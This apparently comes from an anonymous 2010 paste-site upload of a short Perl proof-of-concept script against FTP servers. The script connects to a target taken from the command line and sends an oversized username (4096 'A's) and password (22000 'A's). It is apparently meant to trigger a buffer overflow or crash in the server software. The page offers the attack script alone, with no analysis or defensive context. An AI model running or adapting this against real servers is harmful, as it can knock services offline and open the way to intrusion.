Datei #vmiwnb00-3494

Hochgeladen von einem anonymen Benutzer - 30/07/2010 10:31 - 30 Zugriffe
Quellcode
  1. use Net::FTP;
  2. (($target = $ARGV[0])) || die "usage:$0 <target> <port>";
  3. my $user = "A" x 4096;
  4. my $pass = "A" x 22000;
  5. print "Trying to connect to :$target...\n";
  6. $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect";
  7. print "Connected!\n";
  8. $ftp->login($user, $pass);
  9. print "Poc Successfull\n";
  10. $ftp->quit;